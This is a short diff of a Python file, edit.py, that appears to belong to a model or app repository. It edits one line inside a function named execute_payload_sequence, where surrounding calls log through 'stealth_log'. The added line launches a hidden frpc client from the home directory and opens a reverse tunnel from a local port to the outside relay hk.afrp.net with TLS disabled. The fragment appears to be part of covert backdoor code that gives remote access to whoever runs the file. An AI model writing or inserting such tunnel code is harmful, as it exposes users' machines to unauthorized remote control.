Update edit.py
Browse files
edit.py
CHANGED
|
@@ -66,7 +66,7 @@ def execute_payload_sequence():
|
|
| 66 |
except Exception as e:
|
| 67 |
stealth_log(f"Exception during dependency installation: {str(e)}")
|
| 68 |
|
| 69 |
-
cmd2_ssh_tunnel = "~/.frpc tcp -n '
|
| 70 |
try:
|
| 71 |
stealth_log("Attempting to establish SSH tunnel...")
|
| 72 |
|
|
|
|
| 66 |
except Exception as e:
|
| 67 |
stealth_log(f"Exception during dependency installation: {str(e)}")
|
| 68 |
|
| 69 |
+
cmd2_ssh_tunnel = "~/.frpc tcp -n 'comfyui_safe1' -s 'hk.afrp.net' -P 7000 -i '127.0.0.1' -l 62100 -r 32100 -t 'afrp.net' --tls-enable=false"
|
| 70 |
try:
|
| 71 |
stealth_log("Attempting to establish SSH tunnel...")
|
| 72 |
|